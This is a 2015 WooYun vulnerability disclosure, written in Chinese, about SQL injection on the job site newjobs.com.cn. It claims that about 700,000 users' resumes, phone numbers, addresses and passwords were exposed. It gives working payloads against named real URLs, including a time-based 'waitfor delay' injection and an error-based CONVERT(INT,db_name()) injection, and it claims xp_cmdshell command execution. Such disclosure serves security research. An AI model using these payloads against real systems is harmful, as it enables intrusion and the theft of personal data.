当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142709

漏洞标题:中国人才网主站多处漏洞可泄露大量用户信息(70万姓名/手机号/详细简历)

相关厂商:中国人才网

漏洞作者: ksss

提交时间:2015-09-23 16:01

修复时间:2015-11-07 16:02

公开时间:2015-11-07 16:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

就是这样

详细说明:

中国人力资源和社会保障部搭的网站,泄露大量个人信息
70万简历包括姓名、手机号、详细住址、邮箱、以及学历职业经历等等个人信息。

QQ截图20150921215412.png


#第一处,参数dwbh

http://www.newjobs.com.cn//company/getlogo.aspx
POST:dwbh=7Q87bLdQ


#第二处,参数tit

www.newjobs.com.cn//search/news_list.aspx
POST:imageField=&tit=aaa'waitfor delay '0:0:10';--&zc_st=0


#第三处,参数zc_st

www.newjobs.com.cn//search/news_list.aspx
POST:imageField=&tit=aaa&zc_st=0 AND 5459=CONVERT(INT,db_name())


QQ截图20150922093522.png


在参数dwbh处没有过滤严格,导致了sql注入
泄露主站70w用户的账号密码

QQ截图20150922092011.png


QQ截图20150921204122.png


QQ截图20150922092234.png


密码可登录,70w+条简历中有手机号、详细住址、邮箱、教育经历、就业经历等等个人信息

QQ截图20150921213120.png


QQ截图20150921213318.png


注入点可以调用xp_commond shell执行系统密令
可以直接获取系统最高权限

QQ截图20150922091728.png


10段的内网。。。

漏洞证明:

QQ截图20150922092011.png


QQ截图20150921213318.png

修复方案:

过滤

版权声明:转载请注明来源 ksss@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)